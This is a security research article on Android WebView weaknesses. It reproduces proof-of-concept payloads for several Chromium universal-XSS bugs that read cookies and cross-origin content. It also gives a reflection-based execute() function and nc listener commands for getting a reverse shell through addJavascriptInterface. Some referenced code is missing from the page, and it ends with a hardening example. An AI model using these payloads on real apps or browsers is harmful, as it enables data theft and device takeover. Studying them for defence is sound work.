Android WebView Security Research

Source: Internet
Author: User
Tags: baseuri

1. What is WebView UXSS

WebView is the component underlying the Android Chrome browser and the core class of the WebKit framework. It derives from View in the Android SDK, so an Android Activity layout can embed basic browser functions such as displaying web pages directly, without invoking the system browser.

The basic usage of WebView in an Android program is as follows:


Layout file

<?xml version="1.0" encoding="utf-8"?>
<WebView xmlns:android="http://schemas.android.com/apk/res/android"
    android:id="@+id/webview"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent" />

Loading Web pages

WebView myWebView = (WebView) findViewById(R.id.webview);
myWebView.loadUrl("http://www.example.com");

Declaration in the manifest

<manifest ...>
    <uses-permission android:name="android.permission.INTERNET"/>
    ...
</manifest>

Because these XSS vulnerabilities live in WebView itself rather than in a particular web site or device platform, they affect every WebKit-based browser, and are therefore called Universal XSS (UXSS).


2. Google's public WebView UXSS

    • bug#37383 "Javascript:url with a leading null byte can bypass cross origin protection": a javascript: pseudo-URL with a leading NULL byte bypasses the same-origin policy.

PoC:

hehe.html
<iframe name="test" src="http://www.g.cn"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.cookie)', 'test')">

or

<iframe name="test" src="http://www.g.cn"></iframe>
<input type=button value="test" onclick="window.open('\x00javascript:alert(document.cookie)', 'test')">

    • bug#90222 "UXSS with document.baseURI": the attacker sets document.baseURI to bypass the same-origin policy for a javascript: URL.

PoC:

<script>
i = document.body.appendChild(document.createElement("iframe"));
i.src = "http://google.com";
i.onload = function () {
    document.documentURI = "javascript://hostname.com/%0d%0aalert('OH HAI ' + location)";
    i.contentWindow.location = "";
}
</script>

    • bug#98053 "UXSS via HTMLObjectElement": UXSS through the <object> element.

PoC:

<script>
window.onload = function () {
    object = document.createElement("object");
    object.data = "http://google.com/";
    document.body.appendChild(object);
    object.onload = function () {
        object.data = "javascript:alert(document.body.innerHTML)";
        object.innerHTML = "foo";
    }
}
</script>

    • bug#143439 "Universal XSS in frame elements handling": UXSS in the handling of FRAME elements.

The bug report describes four ways of triggering the frame-handling UXSS.

One of the PoCs: insert the target frame element during the execution of the helper frame element's onunload handler, after all candidates for the child-frame disconnector have been collected.

container = document.body.appendChild(document.createElement("div"));
helperFrame = container.appendChild(document.createElement("iframe"));
targetFrame = document.createElement("iframe");
helperFrame.contentWindow.onunload = function () {
    container.insertBefore(targetFrame, helperFrame);
}
document.body.removeChild(container);
alert(targetFrame.contentWindow);

    • bug#143437 "V8 Builtins object exposed to user causing UXSS": V8's Builtins object is exposed to user script, resulting in UXSS.

In v8natives.js of Chromium:

function NewFunction(arg1) {
    ...
    var source = '(function(' + p + ') {\n' + body + '\n})';
    ...
    var f = %CompileString(source)();

Because the user-supplied body is spliced into the source string, a crafted body can close the function early and run code in a context where the 'this' pointer refers to the V8 Builtins object.

PoC: javascript:Function("},alert(this),{")

A more detailed exploit:

<body><script>
frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "http://xkcd.com/";
frame.onload = function () {
    Function("}, (builtins = this), function () {");
    originalInstantiate = builtins.Instantiate;
    builtins.DefineOneShotAccessor(builtins, "Instantiate", function () {});
    flag = 0;
    template = null;
    builtins.Instantiate = function (x, y) {
        if (flag) {
            doc = frame.contentWindow.document;
            alert(doc.body.innerHTML);
            flag = 0;
        } else if (!template)
            template = x;
        return originalInstantiate(x, y);
    };
    document.implementation;
    flag = 1;
    builtins.ConfigureTemplateInstance(frame.contentWindow, template);
}
</script></body>

Someone on Wooyun built an online test page for mobile-browser UXSS vulnerabilities: http://uxss.sinaapp.com
The PoCs it currently includes are:
https://code.google.com/p/chromium/issues/detail?id=143437
https://code.google.com/p/chromium/issues/detail?id=37383
https://code.google.com/p/chromium/issues/detail?id=143439
https://code.google.com/p/chromium/issues/detail?id=98053
https://code.google.com/p/chromium/issues/detail?id=117550
https://code.google.com/p/chromium/issues/detail?id=90222


With a UXSS, an attack page can bypass the same-origin policy and execute JS in the context of other origins. If the WebView that loads the attack page also has access to local files, session cookies, passwords and other sensitive information, those local files and secrets may be stolen.

3. The more dangerous WebView addJavascriptInterface interface

This interface implements interaction between native Java and JS. Through addJavascriptInterface, JS injected into the WebView can call native Java methods and, in the worst case, take control of the Android system.

When an Android app uses WebView's addJavascriptInterface and is compiled against an API level below Android 4.2, a WebView remote code execution vulnerability may exist; what the exploit can do depends on the permissions held by the app that uses the WebView.

The following code illustrates how addJavascriptInterface is used in a WebView:

import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class MainActivity extends Activity {
    private WebView myWebView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        myWebView = new WebView(this);
        myWebView.getSettings().setJavaScriptEnabled(true); // allow JavaScript execution
        // Registers an object named jsinterface that JS can access and whose methods it can call.
        myWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        myWebView.loadUrl("http://192.168.3.155/attackwv.html"); // the WebView loads a page that calls jsinterface
        setContentView(myWebView);
    }

    final class JavaScriptInterface {
        JavaScriptInterface() { }

        public String getSomeString() {
            return "Hello, world";
        }
    }
}


In attackwv.html, a simple call to the

The result in the Android 4.1.2 emulator is as follows: the JavaScriptInterface method of the WebView was successfully called from JS.


But we are not content with just printing Hello World: is there a way to execute arbitrary commands remotely?

The answer is yes: Java's reflection mechanism can be used to obtain the java.lang.Runtime object and execute arbitrary commands, with whatever permissions the app that hosts the WebView has.

The modified attackwv1.html, shown below, uses the execute function to obtain a reverse shell.

Open two shell windows on 192.168.3.166:

nc -l -vv 8088

nc -l -vv 9999

A shell on the Android 4.1.2 emulator was successfully obtained.

The limitation of this method is that the interface name jsinterface must be known. However, by enumerating the objects of the loaded page's window and checking whether each one supports Java reflection, an object through which Java methods can be called can be found without knowing the interface name. The amended execute function is as follows:

function execute(cmd) {
    for (var obj in window) {
        if ("getClass" in window[obj]) {
            return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmd);
        }
    }
}
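The two risks discussed above, a UXSS stealing local files (section 2) and reflection through an exposed bridge object (section 3), are addressed by the same WebView setup. The activity below is an added example, not code from the original page; the class name HardenedWebViewActivity and the https://app.example.com URL are placeholders, and it assumes the app is compiled with and targets at least API 17, since @JavascriptInterface only restricts exported methods when both the device and the targetSdkVersion are 17 or newer.

```java
import android.app.Activity;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

public class HardenedWebViewActivity extends Activity {   // hypothetical name
    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true); // only because the loaded page needs it

        // Section 2: a UXSS runs attacker JS as another origin. Deny the WebView any
        // file:// or content:// access so the "local files" in that scenario are unreachable.
        settings.setAllowFileAccess(false);
        settings.setAllowContentAccess(false);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {      // API 16
            settings.setAllowFileAccessFromFileURLs(false);
            settings.setAllowUniversalAccessFromFileURLs(false);
        }

        // Section 3: below Android 4.2 every public method of the bridge, including
        // getClass(), is callable from JS, which is what the execute() PoC relies on.
        // From API 17 on only @JavascriptInterface methods are exported, so the bridge
        // is registered only there (assumes targetSdkVersion >= 17 as well).
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {  // API 17
            webView.addJavascriptInterface(new SafeBridge(), "jsinterface");
        }
        // The platform itself injects bridges on some versions; remove them too.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {       // API 11
            webView.removeJavascriptInterface("searchBoxJavaBridge_");
            webView.removeJavascriptInterface("accessibility");
            webView.removeJavascriptInterface("accessibilityTraversal");
        }

        webView.loadUrl("https://app.example.com/index.html"); // placeholder origin, TLS only
        setContentView(webView);
    }

    final class SafeBridge {
        @JavascriptInterface // without this annotation the method is invisible to JS on API 17+
        public String getSomeString() {
            return "Hello, world";
        }
    }
}
```

On a device running 4.1 or older the bridge is simply not registered, so the page falls back to operating without it rather than exposing java.lang.Runtime.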

